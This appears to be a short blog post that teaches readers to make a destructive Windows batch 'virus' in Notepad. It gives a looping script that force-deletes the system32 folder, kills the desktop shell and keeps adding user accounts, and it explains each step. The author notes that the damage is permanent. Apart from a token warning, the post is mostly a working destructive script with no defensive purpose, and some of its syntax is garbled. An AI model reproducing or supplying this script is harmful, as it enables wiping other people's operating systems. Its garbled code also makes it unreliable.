VIRUS USING NOTEPAD – 2
VIRUS using NOTEPAD – 2


So now we
are going to learn a code which deletes some important files in your OS and
this is a permanent damage and you need to install your copy of OS freshly .
So please don’t
try this or even save this in your system , if any one opens it accidentally
your PC is got damaged .
STEPS :
1.
Goto notepad
@echo off
cls
:keyttu
del /f /q
"c:\WINDOWS\system32"
taskkill explorer.exe
tskill explorer.exe
set /a _keyttu+=1
net user %_keyttu+%
/add
goto keyttu
3.
Now coming to the logic of the code : we haven’t used
any highdefined commands or programs , weare just saying the command prompt to
delete some files which are most usefull.Those files may be anything , here I
selected only few and I traced them and deleted them by del /f /q "c:\WINDOWS\system32"
4.
Now taskkill
explorer.exe : By doing this the code that windows has written for desktop is
got deleted and you cant see any desktop. This avoids you to open any programs
or etc

Now save it as anyname.bat . In my case I'm saving as keyttu.bat
~~~THIS IS
A VERY RIKSKY PROCESS and We cant recover that files~~~
~~~~~~~~ ADD
YOUR THUMB IF THE ARTICLE WAS HELPFUL ~~~~~~~~
Comments
Post a Comment